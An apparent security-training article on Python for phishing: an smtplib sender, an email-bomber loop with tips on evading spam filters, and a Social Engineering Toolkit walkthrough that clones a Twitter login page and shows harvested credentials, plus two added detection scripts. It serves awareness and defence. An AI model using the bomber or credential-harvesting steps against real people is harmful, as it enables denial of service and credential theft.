Can Python-based tools be used for phishing?

Python is a scripting language with strong community support, and many offensive tools have been developed in it. For the same reason, Python-based offensive tools are easy to develop, even for beginners. Phishing is no different: several Python-based tools exist for phishing attacks, and it is possible to send sophisticated phishing emails using Python. Social Engineering Toolkit (SET) by Sensepost is a great example of a Python-based phishing tool. The Social Engineering Toolkit comes preinstalled with Kali Linux, and we will discuss some of its features in a later section of this article.

What is a Python email sender?

A Python script that can send emails is generally termed a Python email sender. Python comes with great support for sending emails. Without requiring additional installations, we can use the built-in module available in its standard library for sending emails via SMTP.

The following line can be used to import the smtplib module, which gives us the ability to send emails.

    import smtplib

In all our examples in this article, we will use Gmail as an example. By default, Google doesn't allow us to connect to a Gmail account to send emails, and thus the following step is required before proceeding further.

Access the following URL using the Google account we want to send emails from.

Enable the button as shown in the following figure. Now, the following Python script can be used to send an email from this email ID.

    import smtplib

    # Placeholder subject; replace with the subject line you want
    subject = 'Test email'
    body = 'This email is sent using python'
    message = f'Subject: {subject}\n\n{body}'

    # Connect to Gmail over implicit TLS and authenticate
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    server.login("username", "password")
    server.sendmail(
        "from email address",
        "to email address",
        message)
    server.quit()

Just make sure that the highlighted fields (the username, the password and the two email addresses) are replaced with actual values. Running this script will send an email to the address specified in the To field. In the following figure, we can verify that the email has been successfully delivered.

What is a Python email bomber?

According to Wikipedia, “an email bomb is a form of net abuse consisting of sending large volumes of email to an address in an attempt to overflow the mailbox, overwhelm the server where the email address is hosted in a denial-of-service attack (DoS attack) or as a smoke screen to distract the attention from important email messages indicating a security breach”. A Python program that is capable of sending large volumes of emails to flood the victim is termed an email bomber.

Writing a simple email bomber in Python is as simple as keeping the program shown earlier in a loop. While this is simple to develop, it is also simple to get caught by spam filters due to its simplicity. Because of this, we will need to employ various other techniques, such as using a time delay or sending from a trusted source, to avoid detection. The following script shows an example of a simple email bomb that sends 10 emails to the specified email address. The number in the while loop can be increased to send more emails, but this proves the point.

    body = 'This email is sent using python'
    message = f'Subject: {subject}\n\n{body}'
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    server.login("username", "password")
    i = 1
    # Send the same message 10 times
    while i < 11:
        server.sendmail(
            "from email address",
            "to email address",
            message)
        i += 1
    server.quit()

Once the script is run, we can verify whether the emails are delivered.

As we can see, the emails have been delivered successfully. In this case, the from and to addresses are the same, but it works the same way even when they are different.
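From the defender's side, the volume pattern described above can be spotted in mail-server logs. The following added example (not part of the original article) counts deliveries per recipient over a short and a long sliding window, so that both the quick loop and a time-delayed variant are flagged; the thresholds, addresses and sample traffic are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# (window, max messages tolerated in that window) -- assumed thresholds, tune per mailbox.
RULES = [(timedelta(minutes=1), 5), (timedelta(hours=1), 20)]

def detect_floods(events, rules=RULES):
    """events: (timestamp, recipient) pairs sorted by time, e.g. parsed from MTA logs.
    Returns {(recipient, window): timestamp of the message that first broke the rule}."""
    longest = max(window for window, _ in rules)
    recent = defaultdict(deque)          # recipient -> delivery times inside longest window
    alerts = {}
    for ts, rcpt in events:
        seen = recent[rcpt]
        seen.append(ts)
        while ts - seen[0] > longest:    # drop deliveries that aged out
            seen.popleft()
        for window, limit in rules:
            in_window = sum(1 for t in seen if ts - t <= window)
            if in_window > limit:
                alerts.setdefault((rcpt, window), ts)
    return alerts

def sample_events():
    """Constructed traffic: a 10-message burst, a delayed drip, and a normal mailbox."""
    t0 = datetime(2024, 1, 1, 9, 0, 0)
    burst = [(t0 + timedelta(seconds=i), "burst@example.com") for i in range(10)]
    drip = [(t0 + timedelta(minutes=2 * i), "drip@example.com") for i in range(30)]
    normal = [(t0 + timedelta(hours=3 * i), "normal@example.com") for i in range(4)]
    return sorted(burst + drip + normal)

if __name__ == "__main__":
    for (rcpt, window), ts in sorted(detect_floods(sample_events()).items()):
        print(f"{ts.isoformat()} flood to {rcpt}: limit for {window} window exceeded")
```

The burst trips the one-minute rule on its sixth message, while the drip stays under it and is caught only by the hourly rule.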

Python, phishing and social engineering (SET): understanding the risks

As mentioned earlier, the Social Engineering Toolkit is a useful toolset that can be used for phishing and social engineering attacks. This toolkit is written entirely in Python and comes with a great set of features. Sending mass emails, phishing websites and payload creation are some of the features worth noting. Let us understand how SET can be used to conduct a simple phishing attack.

First, we can clone and install the Social Engineering Toolkit using the commands shown below.

    pip3 install -r requirements.txt
    python setup.py

Once the installation is successful, we can launch the toolkit using the command shown below.

This will show the following menu.

       2) Penetration Testing (Fast-Track)
       3) Third Party Modules
       4) Update the Social-Engineer Toolkit
       5) Update SET configuration
       6) Help, Credits, and About
      99) Exit the Social-Engineer Toolkit
    set> 1

Choosing 1 in the preceding menu will show the menu for Social-Engineering attacks, which looks as follows.

       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) Wireless Access Point Attack Vector
       8) QRCode Generator Attack Vector
       9) Powershell Attack Vectors
      10) Third Party Modules
      99) Return back to the main menu.
    set> 2

We are interested in setting up a phishing attack using a fake web form. So, choosing 2 in the preceding menu shows the options relevant to it.

       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Web Jacking Attack Method
       6) Multi-Attack Web Method
       7) HTA Attack Method
      99) Return to Main Menu
    set:webattack> 3

Within Website Attack Vectors, there are several attacks possible. In this example, we will use the Credential Harvester Attack Method to grab credentials from victims using a fake login page. So, choose 3.

       3) Custom Import
      99) Return to Webattack Menu
    set:webattack> 1

We can choose existing Web Templates or clone a site. Let us choose option 1 to use a template that is available within SET. This will also pick the IP address for the POST back as shown below.

If this IP address is incorrectly picked, we can manually set one. The next step would be to choose a website template from the list below.

       3. Twitter
    set:webattack> Select a template: 3

In this case, we are choosing Twitter. Once done, everything will be set and we should be ready to send our link to the fake login page to the victims by various means such as sending emails.

    The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
    [] The Social-Engineer Toolkit Credential Harvester Attack
    [] Credential Harvester is running on port 80
    [] Information will be displayed to you as it arrives below:

When the victim visits the IP address (or the domain name), the following page appears. If credentials are entered, they will be posted back in the SET console as highlighted below.

    POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=testuser
    POSSIBLE PASSWORD FIELD FOUND: session[password]=hackmeifyoucan
    PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52
    PARAM: scribe_log=
    POSSIBLE USERNAME FIELD FOUND: redirect_after_login=
    PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52
    [] WHEN YOU’RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

The Social Engineering Toolkit is a powerful toolset for anyone to perform social engineering attacks. The powerful features it brings, along with the malicious payloads, are surely a danger if it is used maliciously. User education through internal phishing campaigns is one of the effective ways to prevent such attacks.
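A mail gateway or proxy can triage links like the one described above before a user reaches them. The following added example (not part of the original article or of SET) flags a page that holds a password form but is served without TLS, from a bare IP address, or outside the brand's own domain; the function names, the brand allowlist and the sample HTML are assumptions, with the field names taken from the SET output above.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormScan(HTMLParser):
    """Collects form actions and notes whether any password input exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True

def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def triage_login_page(url, html, brand_domains):
    """Findings for a page reached from an emailed link; [] if nothing stands out."""
    scan = FormScan()
    scan.feed(html)
    if not scan.has_password:
        return []
    page = urlparse(url)
    host = page.hostname or ""
    findings = []
    if page.scheme != "https":
        findings.append("password form served without TLS")
    if is_ip(host):
        findings.append("password form hosted on a bare IP address")
    for brand, domain in brand_domains.items():  # assumed allowlist: keyword -> real domain
        on_brand = host == domain or host.endswith("." + domain)
        if brand in html.lower() and not on_brand:
            findings.append(f"page mentions {brand} but is not served from {domain}")
    for action in scan.actions:
        target = urlparse(urljoin(url, action)).hostname or ""
        if target != host:
            findings.append(f"form posts to another host: {target}")
    return findings

# Constructed sample page; 203.0.113.10 in the usage below is a documentation address.
SAMPLE = ('<title>Twitter</title><form action="/" method="post">'
          '<input name="session[username_or_email]">'
          '<input type="password" name="session[password]"></form>')
```

Calling `triage_login_page("http://203.0.113.10/", SAMPLE, {"twitter": "twitter.com"})` returns three findings, while the same markup served from `https://twitter.com/login` returns none.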

Sources

Trustedsec - Social engineer toolkit
Github - Social engineer toolkit
Infosec IQ - Phishing attack types